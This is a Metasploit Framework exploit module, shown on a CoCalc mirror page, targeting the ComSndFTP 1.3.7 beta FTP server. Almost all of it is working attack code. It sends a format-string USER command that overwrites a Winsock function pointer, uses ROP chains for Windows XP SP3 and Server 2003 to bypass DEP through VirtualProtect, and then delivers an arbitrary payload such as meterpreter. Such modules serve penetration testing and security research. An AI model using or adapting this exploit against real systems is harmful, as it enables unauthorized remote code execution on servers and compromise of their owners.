CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'          => 'ComSndFTP v1.3.7 Beta USER Format String (Write4) Vulnerability',

14
      'Description'   => %q{

15
          This module exploits the ComSndFTP FTP Server version 1.3.7 beta by sending a specially

16
        crafted format string specifier as a username. The crafted username is sent to the server to

17
        overwrite the hardcoded function pointer from Ws2_32.dll!WSACleanup. Once this function pointer

18
        is triggered, the code bypasses dep and then repairs the pointer to execute arbitrary code.

19
        The SEH exit function is preferred so that the administrators are not left with an unhandled

20
        exception message. When using the meterpreter payload, the process will never die, allowing

21
        for continuous exploitation.

22
      },

23
      'Author'        =>

24
        [

25
          'ChaoYi Huang <ChaoYi.Huang[at]connect.polyu.hk>', # vuln discovery + poc

26
          'rick2600 <rick2600[at]corelan.be>',               # msf module (target XP)

27
          'mr_me <mr_me[at]corelan.be>',                     # msf module (target 23k)

28
          'corelanc0d3r <peter.ve[at]corelan.be>'            # msf module

29
        ],

30
      'Arch'          => [ ARCH_X86 ],

31
      'License'       => MSF_LICENSE,

32
      'References'    =>

33
        [

34
          # When a DoS is NOT a DoS

35
          [ 'OSVDB', '82798'],

36
          [ 'EDB', '19024']

37
        ],

38
      'DefaultOptions' =>

39
        {

40
          'EXITFUNC' => 'seh'

41
        },

42
      'Platform'      => ['win'],

43
      'Privileged'    => false,

44
      'Payload'       =>

45
        {

46
          'Space'            => 1000,

47
          'BadChars'         => "\x00\x0a\x0d",

48
          'StackAdjustment'  => -3500,

49
          'DisableNops'      => 'True'

50
        },

51
      'Targets'       =>

52
        [

53
          [

54
            'Windows XP SP3 - English',

55
            {

56
              'Functionpointer'   => 0x71AC4050,  # winsock pointer

57
              'Functionaddress'   => 0x71AB2636,  # the repair address

58
              'Pivot'             => 0x00408D16,  # 0x004093AE-0x698 add esp, 72c ; retn

59
              'Pad' => 568

60
            }

61
          ],

62
          [

63
            'Windows Server 2003 - English',

64
            {

65
              'Functionpointer'   => 0x71C14044,  # winsock pointer

66
              'Functionaddress'   => 0x71C02661,  # the repair address

67
              'Pivot'             => 0x00408D16,  # 0x004093AE-0x698 add esp, 72c ; retn

68
              'Pad' => 568

69
            }

70
          ]

71
        ],

72
      'DisclosureDate' => '2012-06-08'))

73


74
    register_options(

75
      [

76
        Opt::RPORT(21),

77
      ])

78
  end

79


80
  def check

81
    connect

82
    banner = sock.get_once || ""

83
    disconnect

84


85
    validate  = "\x32\x32\x30\x20\xbb\xb6\xd3\xad\xb9"

86
    validate << "\xe2\xc1\xd9\x46\x54\x50\xb7\xfe\xce"

87
    validate << "\xf1\xc6\xf7\x21\x0d\x0a"

88


89
    if banner.to_s == validate

90
      return Exploit::CheckCode::Vulnerable

91
    end

92
    return Exploit::CheckCode::Safe

93
  end

94


95
  def junk(n=4)

96
    return rand_text_alpha(n).unpack("V").first

97
  end

98


99
  def exploit

100


101
    rop = ''

102
    if target.name =~ /Server 2003/

103
      # C:\WINDOWS\system32\msvcrt.dll v7.0.3790.3959

104
      rop = [

105
        0x77be3adb, # pop eax ; retn

106
        0x77ba1114, # <- *&VirtualProtect()

107
        0x77bbf244, # mov eax,[eax] ; pop ebp ; retn

108
        junk,

109
        0x77bb0c86, # xchg eax,esi ; retn

110
        0x77be3adb, # pop eax ; retn

111
        0xFFFFFBFF, # dwSize

112
        0x77BAD64D, # neg eax ; pop ebp ; retn

113
        junk,

114
        0x77BBF102, # xchg eax,ebx ; add [eax],al ; retn

115
        0x77bbfc02, # pop ecx ; retn

116
        0x77bef001, # ptr that is w+

117
        0x77bd8c04, # pop edi ; retn

118
        0x77bd8c05, # retn

119
        0x77be3adb, # pop eax ; retn

120
        0xFFFFFFC0, # flNewProtect

121
        0x77BAD64D, # neg eax ; pop ebp ; retn

122
        0x77be2265, # ptr to 'push esp ; ret'

123
        0x77BB8285, # xchg eax,edx ; retn

124
        0x77be3adb, # pop eax ; retn

125
        0x90909090, # nops

126
        0x77be6591, # pushad ; add al,0ef ; retn

127
      ].pack("V*")

128


129
    elsif target.name =~ /XP SP3/

130
      # C:\WINDOWS\system32\msvcrt.dll v7.0.2600.5512

131
      rop = [

132
        0x77C21D16, # pop eax ; retn

133
        0x77C11120, # <- *&VirtualProtect()

134
        0x77C2E493, # mov eax,[eax] ; pop ebp ; retn

135
        junk,

136
        0x77C21891, # pop esi ; retn

137
        0x77C5D010, # ptr that is w+

138
        0x77C2DD6C, # xchg eax,esi ; add [eax],al; retn

139
        0x77C21D16, # pop eax ; retn

140
        0xFFFFFBFF, # dwSize

141
        0x77C1BE18, # neg eax ; pop ebp ; retn

142
        junk,

143
        0x77C2362C, # pop ebx ; retn

144
        0x77C5D010, # ptr that is w+

145
        0x77C2E071, # xchg eax,ebx ; add [eax],al ; retn

146
        0x77C1F519, # pop ecx ; retn

147
        0x77C5D010, # ptr that is w+

148
        0x77C23B47, # pop edi ; retn

149
        0x77C23B48, # retn

150
        0x77C21D16, # pop eax ; retn

151
        0xFFFFFFC0, # flNewProtect

152
        0x77C1BE18, # neg eax ; pop ebp ; retn

153
        0x77C35459, # ptr to 'push esp ; ret'

154
        0x77C58FBC, # xchg eax,edx ; retn

155
        0x77C21D16, # pop eax ; retn

156
        0x90909090, # nops

157
        0x77C567F0, # pushad ; add al,0ef ; retn

158
      ].pack("V*")

159
    end

160


161
    stage1 = %Q{

162
      mov eax, #{target['Functionpointer']}

163
      mov ecx, #{target['Functionaddress']}

164
      mov [eax], ecx

165
    }

166


167
    offset_wp = rand_text_alphanumeric(1)

168
    pivot     = target['Pivot']

169
    offset    = target['Pad'] + rop.length + stage1.length + payload.encoded.length

170


171
    attackstring  = rand_text_alphanumeric(7)

172
    attackstring << [target['Functionpointer']].pack('V')

173
    attackstring << "%#{pivot}x"                          # special pointer to our pivot

174
    attackstring << "%p" * 208 + "#{offset_wp }%n"        # format specifiers to read and write the function pointer

175
    attackstring << rand_text_alphanumeric(target['Pad'])

176
    attackstring << rop

177
    attackstring << Metasm::Shellcode.assemble(Metasm::Ia32.new, stage1).encode_string

178
    attackstring << payload.encoded

179
    attackstring << rand_text_alphanumeric(2000 - offset)

180
    attackstring << "\r\n"

181


182
    sploit = "USER #{attackstring}\r\n"

183


184
    print_status("Triggering overflow...")

185
    connect

186
    sock.get_once(1024)

187
    sock.put(sploit)

188
    select(nil, nil, nil, 2)

189
    handler

190
    disconnect

191


192
  end

193
end

194


195